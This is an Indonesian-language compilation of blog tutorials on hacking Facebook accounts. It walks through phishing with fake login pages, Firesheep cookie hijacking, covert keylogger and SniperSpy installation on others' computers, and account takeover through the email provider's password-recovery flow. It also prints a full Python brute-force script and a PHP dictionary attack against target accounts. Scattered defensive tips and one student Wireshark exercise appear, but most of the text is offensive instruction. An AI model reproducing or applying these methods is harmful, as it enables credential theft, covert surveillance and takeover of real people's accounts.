Berbagai Cara Hack Facebook

Document Sample
Berbagai Cara Hack Facebook Powered By Docstoc
					                 Berbagai Cara Hack Facebook
    CARA HACK FACEBOOK DENGAN METODE FAKE LOGIN / PHISING / SCAM


    PERTAMA:

    Cara ini paling banyak digunakan dan terbukti efektif untuk meng-hack facebook,
    sebenarnya metodenya simple saja, kita tinggal membuat halaman login palsu yang
    kemudian kita upload ke sebuah website bahkan website gratisan pun bisa, kemudian
    kita pancing pengguna facebook agar menuju halaman login facebook palsu tersebut,
    cara memancing pengguna facebook pun ber macam macam bisa lewat email palsu
    yang mengatasnamakan facebook, link login palsu dan metode social engineering
    lainnya. Cara mencegah hack facebook dengan metode ini : sebelum anda login atau
    memasukkan username dan password anda pastikan bahwa alamat url tersebut benar,
    jika anda tidak yakin buka saja sebuah jendela baru, masukan alamat facebook
     http://www.facebook.com)
    (http://www.facebook.com) dan login melalui jendela tersebut. pastikan keaslian
    email yang mengatasnamakan facebook yang memancing anda agar login facebook
    yang masuk ke inbox anda, atau abaikan saja email tersebut.

    KEDUA:

    Facebook banyak sekali orang yang menggunakannya di indonesia hingga
    ribuanpun.
    hampir-hampir saja facebook diharamkan.

    1. Silahkan anda daftar di http://www.united.net.kg/ atau
    http://www.globalweb.com.ru/hosting.php atau http://biz.ht/
    mengapa saya suruh anda daftar disana ?
    di web hosting sana sangat gratis dan support php juga dari pada di ripway.com

    2. setelah anda berhasil mendaftar, masuk ke FILE MANAGER…hapus file
    index.html.(akan ada di Cpanel masing2 nantinya)


1   3. oke, kita mulai praktek kita.
    yang dibutuhkan adalah file index.php dan write.php sebagai inti fakelogin
    silahkan download scriptnya dahulu disini atau di

    Abe Hack’s | ~Computer Maniac’s~
    http://www.ziddu.com/download/5023245/scriptFakeloginFacebook.rar.html
    ukuran cuma 9kb.

    4. setelah anda download. Disana ada dua file sebut saja index dan write
    kedua-duanya silahkan anda upload di web hosting yang tadi anda sudah daftar.

    5. lalu tes terlebih dahulu index.php yg telah kalian upload dan login dari situ,
    klo berhasil.. akan ada file baru ;Password.txt [bertujuan sebagai tempat dimana
    userID dan password yang akan tertampung di facebook fakelogin kamu]

    6, alright! selesai sampai di sini. . .

    untuk penyebarannya silahkan dengan cara masing2…

    disini saya cm kasih contoh satu untuk pengambilan secara paksa account2 facebook
    mania..
    buka file index di domain webhosting kalian..ambil URL nya.. [penting]

    terus untuk pengguna firefox: buka tools>option>main




2




    Abe Hack’s | ~Computer Maniac’s~
    preview:




    disni fungsinya kita mengarahkan agar browser waktu pertama kali dibuka langsung
    mengarah ke file kita tadi. memungkinkan hasil buruan kalian lebih banyak nantinya.
    boleh di sebar ke komputer temen/di warnet2 kesayangan.

    atau..

    bisa juga menyebarkan dengan cara seperti ini




3




    Abe Hack’s | ~Computer Maniac’s~
    kamu buat account baru,di yahoo,gmail,ato sejenisnya

    dengan nick Facebook@ or something like that.

    diatas cm contoh…silahkan kamu buat seni sendiri
    enjoy..

    mudahkan ??

    semoga berhasil . . ..

    KETIGA:

    Yang paling penting siapin dulu web hosting buat naruh file fake login bisa yang
    gratis atau bayar terserah kalian pilih yg mana.,.,.,.,.,.,
4




    Abe Hack’s | ~Computer Maniac’s~
    1. download dan extract file index.html download dulu disini
    2. download dan extract file logs.php download dulu disini
    3. download dan extract file log.txt download dulu disini

    Password : Flow

    dah disiapin belum web hostingnya? ql belum aku saran mending pakek ripway.

    nah kalau sudah registrasi, kalian upload dech file file yang kalian extract tadi.,.,.,.,.

    pengertian:
    - index.html : Halaman utama login palsu, alamat ini yang kalian sebar ke target.
    Ex: http://h1.ripway.com/nama_kalian/index.html
    - logs.php : Berfungsi untuk mengirimkam hasil hack dari index.html ke logs.txt
    - logs.txt : Berfungsi untuk menampung hasil jerih payah kita
    Ex: Email + Password Facebook.

    sebarin dech alamat Fake Login kita tadi (index.html),.,.,.,
    tinggal tunggu orang yang terlalu ceroboh login pakek Fake login kita.

    saran bagi facebook’er :

    1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya:
    http://www.facebook.com

    2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
    HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
    username dan password kita.

    3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
    Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
    Accessories -> Accessibility -> ‘On-Screen Keyboard’
    Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
    -> Accessories -> Accessibility -> ‘On-Screen Keyboard’

5
    4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
    “Remember me” pada saat login, karena hal itu dapat menyimpan username
    dan password di komputer tersebut. Kecuali memakai komputer pribadi.
    Abe Hack’s | ~Computer Maniac’s~
    5) Jika anda tiba-tiba diminta login ulang, sebaiknya hati hati, karena kemungkinan
    halaman pe-login ulang tersebut adalah halaman palsu yang sengaja dirancang. bila
    terlanjur cepat ganti password kalian,.,.,.,.


    Cara Hack Facebook Dengan Network Sniffing

    PERTAMA:

    Bagi anda pengguna facebook yang menggunakan koneksi internet yang juga
    digunakan banyak orang seperti warnet atau koneksi internet di kampus atau tempat
    umum atau hotspot, apalagi yang gratisan harap berhati-hati. cara hack facebook
    dengan metode ini cukup mudah, berbekal software packet sniffer yang sangat
    mudah di download dan digunakan untuk memantau dan menyimpan paket lalu lintas
    jaringan, seseorang bisa dengan mudah membobol akun facebook dengan
    memanfaatkan paket data yang tersimpan tadi. cara menghindari agar akun facebook
    anda tidak kena hack dengan cara ini adalah dengan berhati-hati saat mengakses
    facebook, pastikan warnet atau hotspot area yang anda gunakan benar-benar aman.

    KEDUA:

    Cukup mudah untuk hacking facebook account saat ini, kmu dapat menggunakan
    firefox addon freesheep, yaitu sebuah addon Firefox yang mampu mencuri sesi
    cookie dari Facebook, Twitter dan account lainnya pada Web 2.0 yang tidak
    terenkripsi jaringan nirkabel terbuka.

    cara menggunakanya sebagai berikut:

    1. Download .xpi file di http://codebutler.github.com/firesheep/
    2. install file .xpi tersebut
    3. Install WinPcap, download di www.winpcap.org
    4. jika instlasi firesheep dan wincap sudah selesai, buka firefox, klik menu tools >
    addons >Firesheep
    5. klik preferences icon dan pilihi kartu interface jaringan pc / wireless card
6   6. klik “Start Capturing”
    7. tunggu beberapa saat, jika ada pengguna wireless yang mengakses website
    facebook maka firesheep akan siap menghack cookies nya.

    Abe Hack’s | ~Computer Maniac’s~
    nah gimana cara mencegah pencurian password dengan firesheep ini?

    kamu dapat menggunakan software ForceTLS, download di
    https://addons.mozilla.org/en-US/firefox/addon/force-tls/

    KETIGA:

    Bismillah,

    pada postingan kali ini akan membahas tentang bagaimana cara melakukan sniffing
    paket data situs jejaring facebook yang keluar masuk dari perangkat komputer yang
    digunakan untuk mengakses situs jejaring sosial tersebut. postingan ini berisi
    jawaban dari tugas yang diberikan pada mata kuliah Keamanan Informasi dengan
    soal sebagai berikut:

    Anda diminta untuk menggunakan program sniffer (penyadap) seperti wireshark,
    tcpdump, atau sejenisnya untuk melakukan salah satu dari hal di bawah ini:

    1. mengukur jumlah data yang digunakan untuk membuka satu sesi gmail atau
       facebook;
    2. memantau serangan dari port scanning yang dilakukan dengan menggunakan
       program nmap.

    Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau
    menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar
    *semua* data ditangkap. Biasanya default dari program sniffer hanya menangkap
    header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.

    Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang
    dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara
    berurutan?

    langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing
    paket data ini:

7
    1. pertama-tama buka aplikasi wireshark
    2. kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan
       jalan pintas menekan tombol Ctrl+I
    Abe Hack’s | ~Computer Maniac’s~
    3. pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang
      dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel
      maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada
      interface yang ingin Anda sadap paket datanya.
    4. pada bagian “Capture filter” masukkan sebagai berikut(ganti
      alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk
      melakukan penyadapan paket data)
      host www.facebook.com and host alamat.ip.komputer.anda
    5. Klik start, maka proses penyadapan akan segera dimulai
    6. Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan
      jalan pintas Ctrl+e
    7. Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih
      menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti




      contoh berikut:

      hasil statistik sniffing paket data facebook
8
    Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari
    facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching


    Abe Hack’s | ~Computer Maniac’s~
    yang ada pada browser yang saya gunakan untuk membuka facebook masih
    menyimpan data-data yang diperlukan sehingga data cukup kecil.

    sekian postingan kali ini.


    Cara Hack Facebook Dengan Keylogger

    PERTAMA:

    Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot
    dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook
    dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang
    berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian
    menggunakan data tersebut untuk mendapatkan username dan password facebook.
    seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau
    menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak
    aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.

    KEDUA:

    Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook
    dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan
    software yang berfungsi untuk memonitoring kegiatan PC dengan me’record /
    merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH!
    Mau ?

    Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis
    disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna
    gunakan yaitu keylogger yang bernama DOUGLAS 1.1.

    Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC
    warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha

    Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.
9




    Abe Hack’s | ~Computer Maniac’s~
     1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download
     tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder
     DOUGLAS_ES .

     2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake
     bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena
     menggunakan bahasa Inggris. hihihi …

     3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File
     dan 1 Folder DATA. iya to ?? hohoho

     4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan
     diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di
     ingat !!

     5. Kalau proses penginstalan sudah selesai, terus ???

     Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu.
     Untuk selanjutnya mudah kok ! hahahaha

     Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha

     Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan
     tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …




10




     Abe Hack’s | ~Computer Maniac’s~
     Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ
     INFORMATION. Terus masukkan password yang sama dengan password yang anda
     masukkan waktu proses penginstalan.

     Nah, Selese dah !!! Mudah to ???

     Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu
     disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan
     PC tersebut.

     Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda.
     Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali
     dengan memasukkan alamat email dan password facebook anda. Lalu buka
     keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih
     READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ???
     anda sendiri yang tahu..

     Selamat mencoba

     KETIGA:




11




     Abe Hack’s | ~Computer Maniac’s~
     SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan
     Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda
     hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas
     log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari
     mana saja di dunia selama Anda memiliki akses internet.

     Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk
     jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata
     remote PC dengan panel kontrol yang AMAN.
     Remote PC software Spy juga menyimpan screenshot bersama dengan teks log
     chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely,
     melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari
     Anda. Termasuk LIVE admin perintah dan kontrol.

     Fitur SniperSpy :
     1. Adalah perangkat lunak mata-mata SniperSpy deployable
     2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
     3. Log Semua keystrokes
     4. Records setiap Password (Email, Login, Instant Messenger dll)
     5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai
     kegiatan IM
     6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
     7. Real Time Screen Viewer
     8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows
     saat ini
     9. Lengkap, bypass Firewall apapun

           www.sniperspy.com/
     http:/www.sniperspy.com/


     Cara Hack Facebook Dengan Metode Bruteforce

     PERTAMA:

12
     Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol
     facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang
     tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan

     Abe Hack’s | ~Computer Maniac’s~
     software bruteforce untuk menebak-nebak password facebook sebuah akun dari
     sebuah file dictionary / kamus atau juga character generator. cara mencegah hack
     facebook dengan metode ini adalah dengan melindungi alamat email yang anda
     gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah
     antara email untuk umum dan email untuk login facebook dan tidak menampilkannya
     di halam profil facebook anda.

     KEDUA:

     Postingan tentang hacking facebook ini gue copas aja dari situs jasakom.com :
     Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya
     account tetapi setidaknya pernah dengar nama ini bukan     ).
     Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini
     setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial
     ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari
     isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan
     motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada         )
     Implementasi Facebook Hacking Dengan Brute Force
     Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun
     beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan
     tujuan untuk mendapatkan account pribadi targetnya.

     ok, cukup basa basinya rel…..to the point aja deh
     sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap
     ….
     yg musti disiapin sebagai berikut
     1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2
     berikut.

      Facebook BruteForce Script


      Simple Dictionary Attack


13   Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
     2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist
     Dictionary ataw mungkin bisa cari yg lebih lengkap.

     Abe Hack’s | ~Computer Maniac’s~
     OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita
     akan melakukan testing.
     disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
     klo ga tau cara bikin hosting silahkan tanya ke google yah   )
     1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
     set_time_limit(0);
     kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik
     hingga code itu menjadi
     set_time_limit(500);
     2.
     $username =”brute@force.org”;
     // username korban misalnya target@bego.com hingga pada code menjadi
     $username =”target@bego.com”;
     3.
     $dictionary =”dictionary.txt”;
     adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
     Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya
     punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu
     directory bernama fb.
     Nah setelah kedua file tersebut sukses di upload dalam 1 direktory




14


     setelah sukses, skr tinggal eksekusi tuh via eb address.

     Abe Hack’s | ~Computer Maniac’s~
     misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di
     http://xxx.com/images/
     jika di eksekusi maka script akan mencoba membruteforce account milik target lo.




     Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama
     cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
     And last word, thanks for you attention if u read a simple tutorial.


     KETIGA:




15




     Abe Hack’s | ~Computer Maniac’s~
     Silakan download FbBruteforce:

     Berikut Codenya:



     #!/usr/bin/python
     # This is facebook bruteforcer tools
     # This was written for educational purpose and pentest only. Use it
     at your own risk.
     # Author will not be responsible for any damage !!
     # Toolname : facebookbruteforcer.py
     # Programmer : Gunslinger_
     # Version : 1.0
     # Date : Tue Jul 27 13:24:44 WIT 2010
     # Special thanks to mywisdom to inspire me


     import re
     import os
     import sys
     import random
16
     import warnings
     import time
     try:

     Abe Hack’s | ~Computer Maniac’s~
     import mechanize
     except ImportError:
     print "[*] Please install mechanize python module first"
     sys.exit(1)
     except KeyboardInterrupt:
     print "\n[*] Exiting program...\n"
     sys.exit(1)
     try:
     import cookielib
     except ImportError:
     print "[*] Please install cookielib python module first"
     sys.exit(1)
     except KeyboardInterrupt:
     print "\n[*] Exiting program...\n"
     sys.exit(1)


     warnings.filterwarnings(action="ignore", message=".*gzip transfer
     encoding is experimental!", category=UserWarning)


     # define variable
     __programmer__ = "gunslinger_ "
     __version__ = "1.0"
     verbose = False
     useproxy = False
     usepassproxy = False
     log = 'fbbruteforcer.log'
     file = open(log, "a")
                http://www.facebook.com/?sk=messages&ref=mb'
     success = 'http://www.facebook.com/?sk=messages&ref=mb'
                https://login.facebook.com/login.php?login_attempt=1'
     fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
     # some cheating ..
     ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10
     sun4u; X11)',
     'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre)
     Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
     'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
     'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
     'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
     'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
     'Microsoft Internet Explorer/4.0b1 (Windows 95)',
17
     'Opera/8.00 (Windows NT 5.1; U; en)',
     'amaya/9.51 libwww/5.4.0',
     'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
     'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
     Abe Hack’s | ~Computer Maniac’s~
     'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like
     Gecko) (Kubuntu)',
     'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net
     bot; .NET CLR 1.1.4322)',
     'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0
     qihoobot@qihoo.net)',
     'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
     ]
     facebook = '''
     __ _ _
     / _| | | | |
     | |_ __ _ ___ ___| |__ ___ ___ | | __
     | _/ _` |/ __/ _ \ '_ \ / _ \ / _ \| |/ /
     | || (_| | (_| __/ |_) | (_) | (_) | <
     |_| \__,_|\___\___|_.__/ \___/ \___/|_|\_\\
     bruteforcer...


     Programmer : %s
     Version : %s''' % (__programmer__, __version__)
     option = '''
     Usage : %s [options]
     Option : -u, --username | User for bruteforcing
     -w, --wordlist | Wordlist used for bruteforcing
     -v, --verbose | Set %s will be verbose
     -p, --proxy | Set http proxy will be use
     -k, --usernameproxy | Set username at proxy will be use
     -i, --passproxy | Set password at proxy will be use
     -l, --log | Specify output filename (default : fbbruteforcer.log)
     -h, --help | Print this help


     Example : %s -u brad@hackme.com -w wordlist.txt"


     P.S : add "&" to run in the background
     ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
     hme = '''
     Usage : %s [option]
     -h or --help for get help
     ''' % sys.argv[0]


18   def helpme():
     print facebook
     print option
     file.write(facebook)

     Abe Hack’s | ~Computer Maniac’s~
     file.write(option)
     sys.exit(1)


     def helpmee():
     print facebook
     print hme
     file.write(facebook)
     file.write(hme)
     sys.exit(1)


     for arg in sys.argv:
     try:
     if arg.lower() == '-u' or arg.lower() == '--user':
     username = sys.argv[int(sys.argv[1:].index(arg))+2]
     elif arg.lower() == '-w' or arg.lower() == '--wordlist':
     wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
     elif arg.lower() == '-l' or arg.lower() == '--log':
     log = sys.argv[int(sys.argv[1:].index(arg))+2]
     elif arg.lower() == '-p' or arg.lower() == '--proxy':
     useproxy = True
     proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
     elif arg.lower() == '-k' or arg.lower() == '--userproxy':
     usepassproxy = True
     usw = sys.argv[int(sys.argv[1:].index(arg))+2]
     elif arg.lower() == '-i' or arg.lower() == '--passproxy':
     usepassproxy = True
     usp = sys.argv[int(sys.argv[1:].index(arg))+2]
     elif arg.lower() == '-v' or arg.lower() == '--verbose':
     verbose = True
     elif arg.lower() == '-h' or arg.lower() == '--help':
     helpme()
     elif len(sys.argv) <= 1:
     helpmee()
     except IOError:
     helpme()
     except NameError:
     helpme()
     except IndexError:
     helpme()
19
     def bruteforce(word):
     try:
     sys.stdout.write("\r[*] Trying %s... " % word)
     Abe Hack’s | ~Computer Maniac’s~
     file.write("[*] Trying %s\n" % word)
     sys.stdout.flush()
     br.addheaders = [('User-agent', random.choice(ouruseragent))]
     opensite = br.open(fblogin)
     br.select_form(nr=0)
     br.form['email'] = username
     br.form['pass'] = word
     br.submit()
     response = br.response().read()
     if verbose:
     print response
     if success in response:
     print "\n\n[*] Logging in success..."
     print "[*] Username : %s" % (username)
     print "[*] Password : %s\n" % (word)
     file.write("\n[*] Logging in success...")
     file.write("\n[*] Username : %s" % (username))
     file.write("\n[*] Password : %s\n\n" % (word))
     sys.exit(1)
     except KeyboardInterrupt:
     print "\n[*] Exiting program...\n"
     sys.exit(1)
     except mechanize._mechanize.FormNotFoundError:
     print "\n[*] Facebook changing their system, please report bug at
     yudha.gunslinger@gmail.com\n
     yudha.gunslinger@gmail.com\n"
     file.write("\n[*] Facebook changing their system, please report bug
        yudha.gunslinger@gmail.com\n")
     at yudha.gunslinger@gmail.com\n
     sys.exit(1)
     except mechanize._form.ControlNotFoundError:
     print "\n[*] Facebook changing their system, please report bug at
     yudha.gunslinger@gmail.com\n
     yudha.gunslinger@gmail.com\n"
     file.write("\n[*] Facebook changing their system, please report bug
        yudha.gunslinger@gmail.com\n")
     at yudha.gunslinger@gmail.com\n
     sys.exit(1)


     def releaser():
     global word
     for word in words:
     bruteforce(word.replace("\n",""))
20

     def main():
     global br

     Abe Hack’s | ~Computer Maniac’s~
     global words
     try:
     br = mechanize.Browser()
     cj = cookielib.LWPCookieJar()
     br.set_cookiejar(cj)
     br.set_handle_equiv(True)
     br.set_handle_gzip(True)
     br.set_handle_redirect(True)
     br.set_handle_referer(True)
     br.set_handle_robots(False)
     br.set_debug_http(False)
     br.set_debug_redirects(False)
     br.set_debug_redirects(False)
     br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
     if useproxy:
     br.set_proxies({"http": proxy})
     if usepassproxy:
     br.add_proxy_password(usw, usp)
     if verbose:
     br.set_debug_http(True)
     br.set_debug_redirects(True)
     br.set_debug_redirects(True)
     except KeyboardInterrupt:
     print "\n[*] Exiting program...\n"
     file.write("\n[*] Exiting program...\n")
     sys.exit(1)
     try:
     preventstrokes = open(wordlist, "r")
     words = preventstrokes.readlines()
     count = 0
     while count < len(words):

21
     words[count] = words[count].strip()
     count += 1
     except IOError:
     print "\n[*] Error: Check your wordlist path\n"
     Abe Hack’s | ~Computer Maniac’s~
     file.write("\n[*] Error: Check your wordlist path\n")
     sys.exit(1)
     except NameError:
     helpme()
     except KeyboardInterrupt:
     print "\n[*] Exiting program...\n"
     file.write("\n[*] Exiting program...\n")
     sys.exit(1)
     try:
     print facebook
     print "\n[*] Starting attack at %s" % time.strftime("%X")
     print "[*] Account for bruteforcing %s" % (username)
     print "[*] Loaded :",len(words),"words"
     print "[*] Bruteforcing, please wait..."
     file.write(facebook)
     file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
     file.write("\n[*] Account for bruteforcing %s" % (username))
     file.write("\n[*] Loaded : %d words" % int(len(words)))
     file.write("\n[*] Bruteforcing, please wait...\n")
     except KeyboardInterrupt:
     print "\n[*] Exiting program...\n"
     sys.exit(1)
     try:
     releaser()
     bruteforce(word)
     except NameError:
     helpme()

     if __name__ == '__main__':
     main()




22
     Cara Hack Facebook Dengan Forgot Password Manual


     Abe Hack’s | ~Computer Maniac’s~
     Untuk mengisi kekosongan postingan dalam blog ini saya mulai dengan berbagi
     pengalaman kenakalan di Internet yang telah saya lakukan. Beberapa waktu sebelum
     dapat berhasil mencuri akun-akun FB, saya sempat kesana kemari, lari sana-sini,
     bolak-balik buka tutup laptop, untuk berkunjung ke “g**gle” seputar hacking akun
     FB dan YAH**[E-mail]. Dan beberapa saran dari blog yang ditemukan “g**gle”,
     bukannya malah mengerti tapi membuat saya bingung sendiri, karena hal yang
     mendasar untuk masuk akun FB kita harus punya E-mail, tentu kita tidak tahu karena
     itu bukan akun miliki sendiri. Selain itu, saya juga geram dengan sampah-sampah di
     blog-blog lain yang dengan enaknya menulis “bla bla bla hack fb, hack yahoo, hack
     bla bla bla —- semua ITU BOHONG BESAR !!!!         “. Nah, apa solusi dari itu semua
     ?

     1. Tentukan terlebih dahulu target FB atau akun si korban. Namun apabila tidak
     dapat mengetahui E-mail target kita, baik secara langsung maupun dari FB jangan
     berharap kita bisa mencuri akun FB-nya. Beberapa setingan di FB biasanya bagi
     mereka yang paham pasti akan menyembunyikan keberadaan E-mail agar terhindar
     dari penyalahgunaan. Seperti gambar di bawah:




23   2. Coba cari tahu E-mail yang digunakan. Barangkali korban yang akan dituju
     menggunakan E-mail selain YAH**, bersiap-siaplah untuk berpikir ulang. Karena



     Abe Hack’s | ~Computer Maniac’s~
     saya kesulitan ketika menemui korban menggunakan E-mail G-m**l, keamanan atau
     apalah bahasa untuk keruwetan dan kerumitan pengelola layanan itu.
     1.3.   Setelah tahu akan calon korban, baru tetapkan tujuan dan niat kita. Masuk ke
     YAH**, dengan akun E-mail calon korban, jika kita belum mengetahui passwordnya
     tentu akan ada peringatan seperti berikut:




     4. Kemudian, langsung saja kita klik “Tidak bisa mengakses account|Bantuan sign
     in”, akan muncul beberapa step by step. Dan muncul beberapa verifikasi, masuk kan
     alamat e-mail si korban yang sudah kita tentukan sebelumnya.
     5. Kurang lebih cara-cara yang akan kita tempuh seperti dibawah ini:




24




     Abe Hack’s | ~Computer Maniac’s~
25




     Abe Hack’s | ~Computer Maniac’s~
26




     Abe Hack’s | ~Computer Maniac’s~
     Apabila masih mengalami kebingungan silahkan coba-coba terus ya,,,      toch ini
     juga kurang baik dilakukan untuk menjahili orang lain. Dari contoh di atas saya
     ambil contoh dengan akun E-mail saya sendiri.
     Setelah kita berhasil masuk ke akun E-mail, kita dapat melaksanakan yang biasa kita
     dengar istilah “Hacking FB atau semacamnya” Karena saya pribadi bingung dengan
     kalimat tersebut. Cara yang bagaimanapun sudah saya cari di g**gle tetap
     kebingungan. Mungkin dengan tulisan ini bisa membantu orang yang berminat
     menjadi “Hacker” tapi semua ini tidak ada gunanya sama sekali meski kita bisa
     berhasil mencuri akun orang lain.
     Selanjutnya, kita mulai masuk ke akun FB si target, dengan cara yang kurang lebih
     sama ketika kita akan mengganti password di YAH**. Bedanya saat kita masuk ke
     FB, kita akan di kirim kode untuk mereset password yang dikirim ke E-mail yang
     telah kita ambil sesuai cara di atas.
     Tentu saja ini akan lebih mudah, karena kita telah mempunyai E-mail dari korban
     yang kita tentukan sebelumnya, metodenya seperti berikut:

     1. Pada pilihan pertama setelah kita gagal masuk dengan akun FB, akan ada pilihan
     seperti berikut:




27
     2. Kita bisa menggunakan alamat E-mail yang telah tentukan tadi, kemudian akan
     ada tampilan selanjutnya untuk menerima kode reset untuk di konfirmasi.


     Abe Hack’s | ~Computer Maniac’s~
     3. Setelah menerima kode tersebut ke E-mail yang sudah kita ambil, “copy-kan” pada
     akun yang baru akan kita ambil alih ini.




     4. Selesai, kita bisa menggunakan akun baru yang telah kita ambil dengan mengikuti
     beberapa langkah petunjuk yang akan membimbing kita. Ikuti setiap instruksi
     selanjutnya dan kita bisa menggunakan akun baru ini.
     Kesimpulan:

